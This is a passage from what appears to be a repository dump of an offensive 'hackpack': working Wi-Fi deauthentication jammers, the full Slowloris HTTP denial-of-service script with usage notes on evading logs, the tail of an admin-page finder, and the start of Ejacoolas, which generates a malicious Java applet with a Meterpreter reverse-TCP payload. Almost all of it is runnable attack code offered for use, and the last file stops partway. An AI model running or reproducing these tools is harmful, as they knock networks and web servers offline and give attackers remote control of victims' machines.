441 | $response->content =~ /Usager/ ||
442 | $response->content =~ /usager/ ||
443 | $response->content =~ /Sing/ ||
444 | $response->content =~ /passe/ ||
445 | $response->content =~ /P\/W/ ||
446 | $response->content =~ /Admin Password/
447 | ){
448 | print " \n [+] Found -> $final\n\n";
449 | }else{
450 | print "[-] Not Found <- $final\n";
451 | }
452 | }
453 | }
454 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ddos/LRDoS.sh:
--------------------------------------------------------------------------------
1 | clear
2 | echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
3 | echo "% Local Router Denial Of Service %"
4 | echo "% By: R4V3N747700 - Top-Hat-Sec %"
5 | echo "% admin@top-hat-sec.com %"
6 | echo "% http://www.top-hat-sec.com %"
7 | echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
8 | echo ""
9 | echo "1. Configure Interface"
10 | echo "2. Configure Target & Attack!"
11 | echo "3. About"
12 | echo ""
13 | echo "Choose Option: "
14 | read menu
15 |
16 | if [ $menu = "1" ]; then
17 | clear
18 | airmon-ng
19 | echo "Type the interface you wish to use: "
20 | read interface
21 | airmon-ng start $interface
22 | echo "Faking MAC"
23 | sleep 2
24 | ifconfig mon0 down
25 | macchanger -r mon0
26 | ifconfig mon0 up
27 | ./LRDoS.sh
28 | else
29 | if [ $menu = "2" ]; then
30 | clear
31 | xterm -T scanning -e airodump-ng mon0 &
32 | echo "Enter target BSSID: "
33 | read bssid
34 | killall airodump-ng
35 | echo "Preforming Denial of Service"
36 | xterm -T attacking -e aireplay-ng -0 0 -a $bssid mon0 &
37 | echo "The attack will last as long as you keep it running.."
38 | echo ""
39 | echo "When you wish to stop the attack, please press enter.."
40 | read enterkey
41 | killall aireplay-ng
42 | ./LRDoS.sh
43 | else
44 | if [ $menu = "3" ]; then
45 | clear
46 | echo "%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
47 | echo "% This tool uses the aircrack-ng suite to send infinite deauth packets %"
48 | echo "% to the target Access Point. Since you do not need to authenticate %"
49 | echo "% with the AP, you can DoS the network until your IP address is blocked %"
50 | echo "% or you decide to stop the attack. As long as the attack is running, %"
51 | echo "% all machines and wireless devices will be kicked off of the target network %"
52 | echo "%=============================================================================%"
53 | echo "%Please Be Responsible - R4V3N747700 - admin@top-hat-sec.com %"
54 | echo "==============================================================================="
55 | echo ""
56 | echo "Press Enter to continue.."
57 | read entermenu
58 |
59 |
60 | else
61 | echo "Invalid Entry.."
62 | sleep 2
63 | ./LRDoS.sh
64 | fi
65 | fi
66 | fi
67 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ddos/slowloris.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl -w
2 | use strict;
3 | use IO::Socket::INET;
4 | use IO::Socket::SSL;
5 | use Getopt::Long;
6 | use Config;
7 |
8 | $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
9 |
10 | print < \$shost,
45 | 'dns=s' => \$host,
46 | 'httpready' => \$httpready,
47 | 'num=i' => \$connections,
48 | 'cache' => \$cache,
49 | 'port=i' => \$port,
50 | 'https' => \$ssl,
51 | 'tcpto=i' => \$tcpto,
52 | 'test' => \$test,
53 | 'timeout=i' => \$timeout,
54 | 'version' => \$version,
55 | );
56 |
57 | if ($version) {
58 | print "Version 0.7\n";
59 | exit;
60 | }
61 |
62 | unless ($host) {
63 | print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
64 | print "\n\tType 'perldoc $0' for help with options.\n\n";
65 | exit;
66 | }
67 |
68 | unless ($port) {
69 | $port = 80;
70 | print "Defaulting to port 80.\n";
71 | }
72 |
73 | unless ($tcpto) {
74 | $tcpto = 5;
75 | print "Defaulting to a 5 second tcp connection timeout.\n";
76 | }
77 |
78 | unless ($test) {
79 | unless ($timeout) {
80 | $timeout = 100;
81 | print "Defaulting to a 100 second re-try timeout.\n";
82 | }
83 | unless ($connections) {
84 | $connections = 1000;
85 | print "Defaulting to 1000 connections.\n";
86 | }
87 | }
88 |
89 | my $usemultithreading = 0;
90 | if ( $Config{usethreads} ) {
91 | print "Multithreading enabled.\n";
92 | $usemultithreading = 1;
93 | use threads;
94 | use threads::shared;
95 | }
96 | else {
97 | print "No multithreading capabilites found!\n";
98 | print "Slowloris will be slower than normal as a result.\n";
99 | }
100 |
101 | my $packetcount : shared = 0;
102 | my $failed : shared = 0;
103 | my $connectioncount : shared = 0;
104 |
105 | srand() if ($cache);
106 |
107 | if ($shost) {
108 | $sendhost = $shost;
109 | }
110 | else {
111 | $sendhost = $host;
112 | }
113 | if ($httpready) {
114 | $method = "POST";
115 | }
116 | else {
117 | $method = "GET";
118 | }
119 |
120 | if ($test) {
121 | my @times = ( "2", "30", "90", "240", "500" );
122 | my $totaltime = 0;
123 | foreach (@times) {
124 | $totaltime = $totaltime + $_;
125 | }
126 | $totaltime = $totaltime / 60;
127 | print "This test could take up to $totaltime minutes.\n";
128 |
129 | my $delay = 0;
130 | my $working = 0;
131 | my $sock;
132 |
133 | if ($ssl) {
134 | if (
135 | $sock = new IO::Socket::SSL(
136 | PeerAddr => "$host",
137 | PeerPort => "$port",
138 | Timeout => "$tcpto",
139 | Proto => "tcp",
140 | )
141 | )
142 | {
143 | $working = 1;
144 | }
145 | }
146 | else {
147 | if (
148 | $sock = new IO::Socket::INET(
149 | PeerAddr => "$host",
150 | PeerPort => "$port",
151 | Timeout => "$tcpto",
152 | Proto => "tcp",
153 | )
154 | )
155 | {
156 | $working = 1;
157 | }
158 | }
159 | if ($working) {
160 | if ($cache) {
161 | $rand = "?" . int( rand(99999999999999) );
162 | }
163 | else {
164 | $rand = "";
165 | }
166 | my $primarypayload =
167 | "GET /$rand HTTP/1.1\r\n"
168 | . "Host: $sendhost\r\n"
169 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
170 | . "Content-Length: 42\r\n";
171 | if ( print $sock $primarypayload ) {
172 | print "Connection successful, now comes the waiting game...\n";
173 | }
174 | else {
175 | print
176 | "That's odd - I connected but couldn't send the data to $host:$port.\n";
177 | print "Is something wrong?\nDying.\n";
178 | exit;
179 | }
180 | }
181 | else {
182 | print "Uhm... I can't connect to $host:$port.\n";
183 | print "Is something wrong?\nDying.\n";
184 | exit;
185 | }
186 | for ( my $i = 0 ; $i <= $#times ; $i++ ) {
187 | print "Trying a $times[$i] second delay: \n";
188 | sleep( $times[$i] );
189 | if ( print $sock "X-a: b\r\n" ) {
190 | print "\tWorked.\n";
191 | $delay = $times[$i];
192 | }
193 | else {
194 | if ( $SIG{__WARN__} ) {
195 | $delay = $times[ $i - 1 ];
196 | last;
197 | }
198 | print "\tFailed after $times[$i] seconds.\n";
199 | }
200 | }
201 |
202 | if ( print $sock "Connection: Close\r\n\r\n" ) {
203 | print "Okay that's enough time. Slowloris closed the socket.\n";
204 | print "Use $delay seconds for -timeout.\n";
205 | exit;
206 | }
207 | else {
208 | print "Remote server closed socket.\n";
209 | print "Use $delay seconds for -timeout.\n";
210 | exit;
211 | }
212 | if ( $delay < 166 ) {
213 | print < "$host",
249 | PeerPort => "$port",
250 | Timeout => "$tcpto",
251 | Proto => "tcp",
252 | )
253 | )
254 | {
255 | $working[$z] = 1;
256 | }
257 | else {
258 | $working[$z] = 0;
259 | }
260 | }
261 | else {
262 | if (
263 | $sock[$z] = new IO::Socket::INET(
264 | PeerAddr => "$host",
265 | PeerPort => "$port",
266 | Timeout => "$tcpto",
267 | Proto => "tcp",
268 | )
269 | )
270 | {
271 | $working[$z] = 1;
272 | $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
273 | }
274 | else {
275 | $working[$z] = 0;
276 | }
277 | }
278 | if ( $working[$z] == 1 ) {
279 | if ($cache) {
280 | $rand = "?" . int( rand(99999999999999) );
281 | }
282 | else {
283 | $rand = "";
284 | }
285 | my $primarypayload =
286 | "$method /$rand HTTP/1.1\r\n"
287 | . "Host: $sendhost\r\n"
288 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
289 | . "Content-Length: 42\r\n";
290 | my $handle = $sock[$z];
291 | if ($handle) {
292 | print $handle "$primarypayload";
293 | if ( $SIG{__WARN__} ) {
294 | $working[$z] = 0;
295 | close $handle;
296 | $failed++;
297 | $failedconnections++;
298 | }
299 | else {
300 | $packetcount++;
301 | $working[$z] = 1;
302 | }
303 | }
304 | else {
305 | $working[$z] = 0;
306 | $failed++;
307 | $failedconnections++;
308 | }
309 | }
310 | else {
311 | $working[$z] = 0;
312 | $failed++;
313 | $failedconnections++;
314 | }
315 | }
316 | }
317 | print "\t\tSending data.\n";
318 | foreach my $z ( 1 .. $num ) {
319 | if ( $working[$z] == 1 ) {
320 | if ( $sock[$z] ) {
321 | my $handle = $sock[$z];
322 | if ( print $handle "X-a: b\r\n" ) {
323 | $working[$z] = 1;
324 | $packetcount++;
325 | }
326 | else {
327 | $working[$z] = 0;
328 | #debugging info
329 | $failed++;
330 | $failedconnections++;
331 | }
332 | }
333 | else {
334 | $working[$z] = 0;
335 | #debugging info
336 | $failed++;
337 | $failedconnections++;
338 | }
339 | }
340 | }
341 | print
342 | "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
343 | sleep($timeout);
344 | }
345 | }
346 |
347 | sub domultithreading {
348 | my ($num) = @_;
349 | my @thrs;
350 | my $i = 0;
351 | my $connectionsperthread = 50;
352 | while ( $i < $num ) {
353 | $thrs[$i] =
354 | threads->create( \&doconnections, $connectionsperthread, 1 );
355 | $i += $connectionsperthread;
356 | }
357 | my @threadslist = threads->list();
358 | while ( $#threadslist > 0 ) {
359 | $failed = 0;
360 | }
361 | }
362 |
363 | __END__
364 |
365 | =head1 TITLE
366 |
367 | Slowloris
368 |
369 | =head1 VERSION
370 |
371 | Version 0.7 Beta
372 |
373 | =head1 DATE
374 |
375 | 06/17/2009
376 |
377 | =head1 AUTHOR
378 |
379 | RSnake with threading from John Kinsella
380 |
381 | =head1 ABSTRACT
382 |
383 | Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
384 |
385 | =head1 AFFECTS
386 |
387 | Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
388 |
389 | =head1 NOT AFFECTED
390 |
391 | IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
392 |
393 | =head1 DESCRIPTION
394 |
395 | Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
396 |
397 | As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
398 |
399 | =head2 Testing
400 |
401 | If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
402 |
403 | =head3 Testing Example:
404 |
405 | ./slowloris.pl -dns www.example.com -port 80 -test
406 |
407 | This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
408 |
409 | =head2 HTTP DoS
410 |
411 | Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
412 |
413 | =head3 HTTP DoS Example:
414 |
415 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
416 |
417 | =head2 HTTPReady Bypass
418 |
419 | HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
420 |
421 | =head3 HTTPReady Bypass Example
422 |
423 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
424 |
425 | =head2 Stealth Host DoS
426 |
427 | If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
428 |
429 | =head3 Stealth Host DoS Example:
430 |
431 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
432 |
433 | =head2 HTTPS DoS
434 |
435 | Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
436 |
437 | =head3 HTTPS DoS Example:
438 |
439 | ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
440 |
441 | =head2 HTTP Cache
442 |
443 | Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
444 |
445 | =head3 HTTP Cache Example:
446 |
447 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
448 |
449 | =head1 Issues
450 |
451 | Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
452 |
453 | Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
454 |
455 | For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
456 |
457 | Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
458 |
459 | =head1 What is a slow loris?
460 |
461 | What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
462 |
463 | http://www.youtube.com/watch?v=rLdQ3UhLoD4
464 |
465 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ddos/wifijammer_0.1.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # This is a bash based wifi jammer. It uses your wifi card
3 | # to continuously send de-authenticate packets to every client
4 | # on a specified channel... at lest thats what its suppose to do.
5 | # This program needs the Aircrack-ng suit to function
6 | # - and a wifi card that works with aircrack.
7 | # Checks if this file is being ran as root.
8 | if [ x"`which id 2> /dev/null`" != "x" ]
9 | then
10 | USERID="`id -u 2> /dev/null`"
11 | fi
12 | if [ x$USERID = "x" -a x$UID != "x" ]
13 | then
14 | USERID=$UID
15 | fi
16 | if [ x$USERID != "x" -a x$USERID != "x0" ]
17 | then
18 | #Guess not
19 | echo Run it as root ; exit ;
20 | fi
21 | # Changes working directory to the same as this file
22 | DIR="$( cd "$( dirname "$0" )" && pwd )"
23 | cd $DIR
24 | # Sets first command line VAR
25 | WIFIVAR="$1"
26 | #Checks if user specified a WIFI card
27 | if [ x"$WIFIVAR" = x"" ]
28 | then
29 | echo "No wifi card specified, scanning for available cards (doesnt always work)"
30 | USWC="no"
31 | else
32 | echo "Using user specified wifi card ""$WIFIVAR"
33 | USWC="yes"
34 | fi
35 | if [ x"$USWC" = x"no" ]
36 | then
37 | # Uses Airmon-ng to scan for available wifi cards.
38 | airmon-ng|cut -b 1,2,3,4,5,6,7 > clist01
39 | count=0
40 | if [ -e "clist" ]; then
41 | rm clist
42 | fi
43 | cat clist01 |while read LINE ; do
44 | if [ $count -gt 3 ];then
45 | echo "$LINE" | cut -b 1-7 | tr -d [:space:] >>clist
46 | count=$((count+1))
47 | else
48 | count=$((count+1))
49 | fi
50 | done
51 | rm clist01
52 | WIFI=`cat clist`
53 | echo "Using first available Wifi card: `airmon-ng|grep "$WIFI"`"
54 | echo "If you would like to specify your own card please do so at the command line"
55 | echo "etc: sudo ./wifijammer_0.1 eth0"
56 | rm clist
57 | else
58 | WIFI="$WIFIVAR"
59 | fi
60 | #Check for a wifi card
61 | if [ x"$WIFI" = x"" ]; then
62 | #Guess no wifi card was detected
63 | echo "No wifi card detected. Quitting"
64 | exit
65 | fi
66 | #Start the wireless interface in monitor mode
67 | if [ x"$airmoncard" != x"1" ]; then
68 | airmon-ng start $WIFI >tempairmonoutput
69 | airmoncard="1"
70 | fi
71 | #Looks for wifi card thats been set in Monitor mode
72 | if [ x"$testcommandvar02" = x"" ];then
73 | WIFI02=`cat tempairmonoutput|grep "monitor mode enabled on" |cut -b 30-40 | tr -d [:space:] |tr -d ")"`
74 | if [ x$WIFI02 = x ];then
75 | WIFI02=`cat tempairmonoutput|grep "monitor mode enabled" |cut -b 1-5 | tr -d [:space:]`
76 | fi
77 | WIFI="$WIFI02"
78 | rm tempairmonoutput
79 | fi
80 | echo "$WIFI"
81 | # Asks user to specify a channel to jam, or to see a 40 second scan of the area
82 | read -p "Please specify a channel to jam, or type in 'scan' (without quotes) to see airodump's output for 40 seconds:" NUMBER
83 | # If something was entered that was not "scan" then assume its a number and continue
84 | if [ x"$NUMBER" != x"scan" ];then
85 | CHANNEL="$NUMBER"
86 | else
87 | # scan was entered, so start airodump-ng in channel hopping mode to scan the area
88 | airodump-ng $WIFI &
89 | SCANPID=$!
90 | sleep 40s
91 | kill $SCANPID
92 | sleep 1s
93 | # Asks user to specify a channel
94 | read -p "Please specify a channel to jam:" NUMBER
95 | CHANNEL="$NUMBER"
96 | fi
97 | # Launches airodump-ng on specified channel to start gathering a client list
98 | rm *.csv
99 | xterm -fn fixed -geom -0-0 -title "Scanning specified channel" -e "airodump-ng -c $NUMBER -w airodumpoutput $WIFI" 2>/dev/null &
100 | # Removes temp files that are no longer needed
101 | rm *.cap 2>/dev/null
102 | rm *.kismet.csv 2>/dev/null
103 | rm *.netxml 2>/dev/null
104 | # Makes a folder that will be needed later
105 | mkdir stationlist 2>/dev/null
106 | rm stationlist/*.txt
107 | # Start a loop so new clients can be added to the jamming list
108 | while [ x1 ];do
109 | sleep 5s
110 | # Takes appart the list of clients and reorganizes it in to something useful
111 | cat airodumpoutput*.csv|while read LINE01 ; do
112 | echo "$LINE01" > tempLINE01
113 | LINE=`echo $LINE01|cut -f 1 -d ,|tr -d [:space:]`
114 | rm tempLINE01
115 | # Ignores any blank
116 | if [ x"$LINE" != x"" ];then
117 | if [ x"$LINE" = x"StationMAC" ];then
118 | start="no"
119 | fi
120 | if [ x"$start" = x"yes" ];then
121 | if [ -e stationlist/"$LINE".txt ];then
122 | echo "" 2>/dev/null
123 | else
124 | # Lauches new window with de-authenticate thingy doing it's thing
125 | xterm -fn fixed -geom -0-0 -title "Jamming $LINE" -e "aireplay-ng --deauth 0 -a $LINE $WIFI" &
126 | echo "$LINE" > stationlist/$LINE.txt
127 | fi
128 | fi
129 | if [ x"$LINE" = x"BSSID" ];then
130 | start="yes"
131 | fi
132 | fi
133 | done
134 | done
135 |
--------------------------------------------------------------------------------
/hackpack/hackpack/ejacoolas.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | #SOME VARIABLES
4 | version="0.5"
5 | defaultfolder=/root/Ejacoolas/
6 | defaultfolder2=/root/Ejacoolas
7 | ip=`ifconfig | awk -F':' '/inet addr/&&!/127.0.0.1/{split($2,_," ");print _[1]}'`
8 |
9 | #CHANGELOG
10 | #v0.5
11 | #-Added the silent mode, for when you really need to do Splinter Cell
12 | #-Added some updating checks, no big deal
13 | #-Added the help option, but I'll not describe it within the help itself cause I'm a dick
14 | #-Added the import option, use it to import the applet that suites the situation
15 | #-Added the discard applet option in main menu
16 | #-Fixed some bugs in IP management
17 | #v0.42
18 | #-Added the template download and infection option
19 | #-Added a signal 2 trap for removing temp files
20 | #-Added some checks during the template download phase
21 | #-The bug fixing continues
22 | #v0.4
23 | #-Added the update feature, thanks to yamas (and Comax) for the great idea!
24 | #-Fixed some typos and bugs
25 | #v0.3 (thanks to Comax for his testing)
26 | #-Initial release, alpha version.
27 | #-Provides only basical features, but hey they work!
28 |
29 | #CLEANING FUNCTION
30 |
31 | trap quickcleanup 2
32 |
33 | quickcleanup() {
34 | echo -e "\n\033[1;31m[!] Caught Ctrl+C, removing temporary files...\n"
35 | rm /tmp/$appletname.rc 2>/dev/null
36 | rm /tmp/$appletname.java 2>/dev/null
37 | rm /tmp/$appletname.class 2>/dev/null
38 | rm /tmp/metasploit.dat 2>/dev/null
39 | rm -R /tmp/metasploit 2>/dev/null
40 | rm -R /tmp/META-INF 2>/dev/null
41 | rm /tmp/mykeystore 2>/dev/null
42 | rm /tmp/$appletname.jar 2>/dev/null
43 | rm -R /tmp/sitetmp 2>/dev/null
44 | rm /tmp/$appletname.handler.sh 2>/dev/null
45 | exit
46 | }
47 |
48 | cleanup() {
49 | rm /tmp/$appletname.rc 2>/dev/null
50 | rm /tmp/$appletname.java 2>/dev/null
51 | rm /tmp/$appletname.class 2>/dev/null
52 | rm /tmp/metasploit.dat 2>/dev/null
53 | rm -R /tmp/metasploit 2>/dev/null
54 | rm -R /tmp/META-INF 2>/dev/null
55 | rm /tmp/mykeystore 2>/dev/null
56 | rm /tmp/$appletname.jar 2>/dev/null
57 | rm -R /tmp/sitetmp 2>/dev/null
58 | rm /tmp/$appletname.handler.sh 2>/dev/null
59 | }
60 |
61 | #MODES AND OPTIONS
62 |
63 | if [[ $1 == "-h" || $2 == "-h" || $3 == "-h" || $1 == "--help" || $2 == "--help" || $3 == "--help" || $4 == "-h" || $4 == "--help" || $5 == "-h" || $5 == "--help" ]]; then
64 | echo -e "Ejacoolas v$version, by torpedo48
65 |
66 | Usage: $0
67 |
68 | Options:
69 | -h , --help I'm not describing this one, sorry...
70 |
71 | -s Activate Silent Mode (no Internet downloads)
72 |
73 | -i , Import an existing Evil Java Applet.
74 | --import No new applet will be generated.
75 |
76 |
77 |
78 | "
79 | exit
80 | fi
81 |
82 |
83 | if [[ $1 == "-s" || $2 == "-s" || $3 == "-s" ]]; then
84 | silentmode=1
85 | echo -e "\033[1;31m[!] Warning: your are running in Silent Mode. No data will be downloaded from the Internet...\n\n\n"
86 | sleep 3
87 | fi
88 |
89 | #UPDATING FUNCTION
90 | update() {
91 | if [[ $lastavailable > $version ]]; then
92 | echo "A new version of Ejacoolas is available (v$lastavailable), do you want to update (recommended)? [y|n] (default: \"y\")"
93 | read userupdate
94 | if [ $userupdate == "" ]; then
95 | userupdate="y"
96 | fi
97 | case $userupdate in
98 | n) echo "You don't know what you're missing..."
99 | sleep 2;;
100 | y) wget -q http://torpedo48.it/ejacoolas/ejacoolas.sh -O $0
101 | chmod +x $0
102 | echo "Update was successfull! Launching the script...\n\n\n\n"
103 | sleep 2
104 | $0
105 | exit;;
106 | *) echo -e "Please insert just \"y\" or \"n\"...\n"
107 | update;;
108 | esac
109 | else echo -e "Your Ejacoolas is up-to-date, proceeding..."
110 | fi
111 | echo -e "\n\n\n\n"
112 | }
113 |
114 | if [ "$silentmode" != "1" ]; then
115 | echo "Checking if an update is available..."
116 | wget -q http://torpedo48.it/ejacoolas/info -O /tmp/info
117 | if [ "$?" != "0" ]; then
118 | echo -e "\033[0;31m[!] Error while downloading update information...\n\n"
119 | sleep 3
120 | else lastavailable=`cat /tmp/info | grep version`
121 | lastavailable=`echo ${lastavailable#"version: "}`
122 | rm /tmp/info
123 | update
124 | fi
125 | fi
126 |
127 | #GREETINGS
128 | echo -e "
129 | \033[1;31m#############################################################################\033[1;37m
130 | _____ _ _ ____ ___ ___ _ _ ____
131 | | ____| | | / \ / ___| / _ \ / _ \ | | / \ / ___|
132 | | _| _ | | / _ \ | | | | | | | | | | | | / _ \ \___ \
133 | | |___ | |_| | / ___ \ | |___ | |_| | | |_| | | |___ / ___ \ ___) |
134 | |_____| \___/ /_/ \_\ \____| \___/ \___/ |_____| /_/ \_\ |____/
135 |
136 | \033[1;31m#############################################################################
137 | \033[0;37m The Evil Java Applet COOL Automation Script
138 | brought to you by torpedo48
139 | http://torpedo48.it
140 | #############
141 | If you find a bug or have a suggestion, please
142 | contact me: admin@torpedo48.it
143 | ##################################################
144 | v$version
145 |
146 | "
147 |
148 | importapplet() {
149 | echo -e "\033[1;37m[...] Importing the specified file into Ejacoolas..."
150 | #importfilename=`basename $importfile | grep jar`
151 | if [ ! -f $importfile ]; then
152 | echo -e "\033[1;31m[!] Error: the specified file \"$importfile\" does not exist. Exiting...\n"
153 | sleep 3
154 | exit
155 | fi
156 | case $importfile in
157 | *.jar) appletname=`basename $importfile .jar`
158 | cp $importfile /tmp/ #aggiungi controllo
159 | imported=1
160 | echo -e "\033[1;32m[->] Applet \"$appletname.jar\" successfully imported.
161 |
162 | \033[1;37mNote that the imported applet had been set with its own IP address and port to contact after the infection. You will not receive any session if your current IP (\"$ip\") is not the one set within the applet, or if your handler is not listening on the applet's port.
163 |
164 | Please enter the port used by the imported applet. As already said, if you enter a wrong port Ejacoolas' handler won't work. (default: \"4448\")"
165 | read userport
166 | if [ "$userport" == "" ]; then
167 | port=4448
168 | else port=$userport #aggiungi un controllo per evitare caratteri non numerici
169 | fi
170 | echo -e "\033[1;32m[->] Using port $port for the handler.\n";;
171 | *) echo -e "\033[1;31m[!] Error: the specified file \"$importfile\" is not a valid JAR file. Exiting...\n"
172 | sleep 3
173 | exit;;
174 | esac
175 | }
176 |
177 | if [[ $1 == "-i" || $1 == "--import" ]]; then
178 | importfile="$2"
179 | importapplet
180 | fi
181 | if [[ $2 == "-i" || $2 == "--import" ]]; then
182 | importfile="$3"
183 | importapplet
184 | fi
185 | if [[ $3 == "-i" || $3 == "--import" ]]; then
186 | importfile="$4"
187 | importapplet
188 | fi
189 | if [[ $4 == "-i" || $4 == "--import" ]]; then
190 | importfile="$5"
191 | importapplet
192 | fi
193 | if [[ $5 == "-i" || $5 == "--import" ]]; then
194 | importfile="$6"
195 | importapplet
196 | fi
197 |
198 |
199 | createapplet() {
200 | #ASK FOR APPLET NAME
201 | echo -e "\033[1;37mPlease insert a name for the applet. Note that this will be shown to the victim when prompted to accept the applet itself. (default: Java_Applet)"
202 | read appletname
203 | if [ "$appletname" == "" ]; then
204 | appletname=Java_Applet
205 | else appletname=`echo "$appletname" | tr ' ' '_'`
206 | appletname=`echo "$appletname" | tr [:punct:] '_'`
207 | fi
208 | echo -e "\033[1;32m[->] \"$appletname\" will be used as applet name.\n"
209 |
210 | #ASK FOR PAYLOAD SETTINGS
211 | echo -e "\033[1;37m[...] Detecting local IP Address..."
212 | ip=`ifconfig | awk -F':' '/inet addr/&&!/127.0.0.1/{split($2,_," ");print _[1]}'`
213 | if [ "$ip" == "" ]; then
214 | echo -e "\033[1;31m[!] No IP Address found for this machine. Are you connected to a network?"
215 | echo -e "\033[1;37mPlease insert your IP Address:"
216 | read ip
217 | else echo -e "\033[1;37mIp Address $ip found for this machine. Press ENTER to use it, or specify the IP Address you want to use."
218 | read userip
219 | if [ "$userip" != "" ]; then
220 | ip=$userip
221 | fi
222 | fi
223 | echo -e "\033[1;32m[->] $ip will be used as local IP Address.\n"
224 |
225 | echo -e "\033[1;37mPlease insert the port you want to use for the payload (default: 4448):"
226 | read userport
227 | if [ "$userport" == "" ]; then
228 | port=4448
229 | else port=$userport #aggiungi un controllo per evitare caratteri non numerici
230 | fi
231 | echo -e "\033[1;32m[->] Using port $port for the payload.\n"
232 |
233 | #GENERATE THE PAYLOAD
234 | echo -e "\033[1;37m[...] Generating the Java Meterpreter Reverse_tcp payload..."
235 | echo "use payload/java/meterpreter/reverse_tcp
236 | set LHOST $ip
237 | set LPORT $port
238 | generate -t jar -f /tmp/$appletname.jar
239 | exit" > /tmp/$appletname.rc
240 | cd /pentest/
241 | msfconsole -r /tmp/$appletname.rc 2>/dev/null
242 | if [[ "$?" != "0" || ! -s /tmp/$appletname.jar ]]; then
243 | echo -e "\033[1;31m[!] Error encountered while generating the payload, exiting..."
244 | cleanup
245 | read userexit
246 | exit
247 | else echo -e "\033[1;32m[->] Payload successfully generated.\n"
248 | rm /tmp/$appletname.rc
249 | fi
250 |
251 | #ADD THE CLASS FILE
252 | echo -e "\033[1;37m[...] Generating a launcher CLASS file for executing the payload within the applet..."
